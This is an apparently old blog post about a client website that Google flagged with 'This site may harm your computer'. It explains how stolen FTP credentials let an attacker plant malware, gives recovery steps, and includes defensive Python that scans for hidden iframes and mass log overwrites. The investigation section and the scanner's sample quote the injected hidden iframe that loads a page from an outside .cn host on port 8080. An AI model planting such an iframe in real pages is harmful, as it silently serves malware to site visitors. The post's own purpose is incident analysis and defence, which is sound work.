Google Search Results: “This site may harm your computer”

Google has introduced a new piece of logic into its indexing engine that detects malware embedded within websites. If your website has been compromised (I will explain what ‘compromised’ means later), then you will see “This site may harm your computer” when you search Google for your website.

Within this article we will discuss:

  1. What it means to have a compromised website
  2. How a compromise occurs
  3. How to resolve this issue
  4. How to work with Google to remove the “This site may harm your computer” link

What does it mean to have a compromised website?

Recently we had a client call us with this concern.  Several of his clients contacted him and said that when they searched for his website on Google, they were presented with a link under the title of the result page that said “This site may harm your computer”.  The result looked just like this:

[Screenshot of the Google search result, with the “This site may harm your computer” link shown under the title of the result]

How did this happen?

In this case, it is easy to look at the result of the attack and work backward toward how the attack occurred. Here is what we know:

  1. The attacker placed the following line of code in a website file:
    <iframe src="http://filmlifeimages.cn:8080/index.php"
    width=180 height=111 style="visibility: hidden"></iframe>
  2. After consulting with the client, who had FTP access, we knew that he was not responsible for uploading a file containing this information.
  3. We noted the modification date of the file on the file system: 6/10/2009 @ 2:08am CST.
  4. We then looked at the FTP log files to understand what happened on the 10th at 2:08am.
  5. The log file showed that every page on the site was overwritten (status 226) on or around 2:08am.
  6. The account used to access the server was a valid FTP account.

Based on this information, and a few other things that we collected from the client, we are 99% sure that the client’s computer was infected by a ‘keylogger’ program. A ‘keylogger’ does exactly what it sounds like: it logs all of the keystrokes you make on your computer and, oftentimes, transmits the data to a computer outside of your network, which is then accessed by the hacker.

To test our ‘keylogger’ theory, we connected a dummy system to the infected website and, sure enough, we were infected with a keylogger.
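The injected frame above is hidden with CSS and points at an off-site host on a non-standard port; those three properties are what a site owner should scan their own files for. The following is an added example (not the author's tooling) that flags concealed iframes in HTML and reports off-site hosts and odd ports as context; the sample page is constructed and modelled on the iframe quoted in the investigation.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: one legitimate embed plus an injected frame
# modelled on the iframe quoted in the investigation above.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.youtube.com/embed/example" width="560" height="315"></iframe>
<iframe src="http://filmlifeimages.cn:8080/index.php"
width=180 height=111 style="visibility: hidden"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
# Attribute parser that tolerates unquoted values such as width=180.
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*("([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')

def parse_attrs(raw):
    """Map lower-cased attribute names to values for one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = m.group(3) or m.group(4) or m.group(5) or ""
    return attrs

def suspicious_iframes(html, site_host):
    """Return (src, reasons) for every iframe concealed from the visitor;
    an off-site host or odd port is added to reasons as supporting context."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        style = attrs.get("style", "").replace(" ", "").lower()
        reasons = []
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via CSS")
        sizes = [attrs.get(k, "") for k in ("width", "height")]
        if any(v.isdigit() and int(v) <= 2 for v in sizes):
            reasons.append("near-zero size")
        if not reasons:
            continue  # visible frames are ordinary embeds, not injections
        parsed = urlparse(src)
        host = parsed.hostname or ""
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.append("external host " + host)
        if parsed.port not in (None, 80, 443):
            reasons.append("non-standard port %d" % parsed.port)
        findings.append((src, reasons))
    return findings
```

Run it over every HTML, PHP and JavaScript template on the site; the legitimate video embed in the sample is not reported because it is visible.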

How do I resolve this issue?

If you are the hosting company, you should know what to do: reset the FTP account password, remove any access to port 21 on your firewall, and begin restricting access by IP or VPN.
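The hosting company is also the party holding the FTP logs, and steps 4 and 5 of the investigation above (a valid account overwriting every page at 2:08am) are a pattern that can be checked automatically. This is an added example, not the author's procedure; it assumes a simplified log line format and a constructed log that reproduces that burst.

```python
from collections import defaultdict
from datetime import datetime

# Constructed transfer log in an assumed simple format:
#   <date> <time> <account> <command> <path> <status>
# Real FTP daemons log differently; only parse_line() needs adapting.
SAMPLE_LOG = """\
2009-06-09 14:12:03 webclient STOR /news.html 226
2009-06-09 14:12:41 webclient STOR /images/logo.png 226
2009-06-10 02:08:02 webclient STOR /index.html 226
2009-06-10 02:08:05 webclient STOR /about.html 226
2009-06-10 02:08:07 webclient STOR /contact.html 226
2009-06-10 02:08:09 webclient STOR /products.html 226
2009-06-10 02:08:12 webclient STOR /news.html 226
2009-06-10 09:30:15 webclient RETR /index.html 226
"""

def parse_line(line):
    """Split one log line into (timestamp, account, command, path, status)."""
    date, time, account, command, path, status = line.split()
    ts = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S")
    return ts, account, command, path, status

def mass_overwrites(log_text, window_minutes=5, min_files=4, quiet_hours=(0, 6)):
    """Group completed uploads (STOR, status 226) per account into fixed
    windows and report windows in which at least min_files distinct paths
    were written. off_hours marks windows inside the quiet_hours range."""
    buckets = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, account, command, path, status = parse_line(line)
        if command != "STOR" or status != "226":
            continue
        start = ts.replace(second=0, microsecond=0,
                           minute=ts.minute - ts.minute % window_minutes)
        buckets[(account, start)].add(path)
    alerts = []
    for (account, start), paths in sorted(buckets.items()):
        if len(paths) >= min_files:
            alerts.append({
                "account": account,
                "start": start,
                "files": sorted(paths),
                "off_hours": quiet_hours[0] <= start.hour < quiet_hours[1],
            })
    return alerts
```

The two uploads on the 9th stay below the threshold and are not reported; the five overwrites at 02:08 on the 10th are, and the off_hours flag is what distinguishes an attacker's session from a normal deployment.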

If you are the client, your computer, and potentially your network, is infected with a keylogger program. Our suggestion is that you complete the following steps immediately:

  1. If you do online banking, call your bank immediately to have your account credentials changed.
  2. If you have purchased anything online recently, call your credit card companies and have them reissue you a new card.
  3. If you have provided any websites with significant information about your identity, contact an identity theft protection service.

Once you have completed the steps above, you then have to remove the keylogger program from your system. We recommend using AVAST, found at http://www.avast.com/, though there are several similar products available on the internet. Run a full scan of your system and remove all of the infected files. Going forward, you should keep this type of software running at all times and conduct full system/network scans on a routine basis.

How do I work with Google to remove the “This site may harm your computer” link?

The process to remove the “harmful” status is very basic. Navigate to the following page and scroll to the bottom of it: http://www.google.com/support/webmasters/bin/answer.py?answer=45432


6 Responses to “Google Search Results: “This site may harm your computer””

  1. Thomas J. Raef Says:

    We have seen many of these iframe infections lately. It seems to be the website infection du jour.

    It could be a keylogger or it could also be a virus we’ve seen a lot of that sniffs the FTP traffic from the PC to the website. As you know, FTP transmits in plain text. So all data, including the username and password are easy to sniff in the traffic stream. This information is then sent to a server that takes that information, logs in to the site, modifies the code, then monitors it for any changes. If the malicious server detects any changes or missing malscripts, it tries to re-infect the website.

    We’ve seen many reports of website owners complaining that part of their morning breakfast ritual is to re-upload their site. After changing the FTP password and scanning their PC and cleaning it, we recommend that all website owners move away from FTP and go to either SFTP or FTPS both of which encrypt their transmissions making it nearly impossible to sniff the FTP credentials.

    Just thought you might like to pass that along to your readers as well.

    Thank you.

  2. Search file Says:

    great info liked it…

  3. Geri D. Mahoney Says:

    Highly informative write up. I am off to share this with my friends.

  4. Compras Panama Says:

    Superb, thanks for posting!

  5. Thedutchguy Says:

    Great article, will definitely check out this website for more! Keep it up. Regards.

  6. world cup 2010 betting odds Says:

    This is one of the most honest blogs I have ever read. Nothing overcomes good first hand experience on topics. Thank you for being sincere about this.
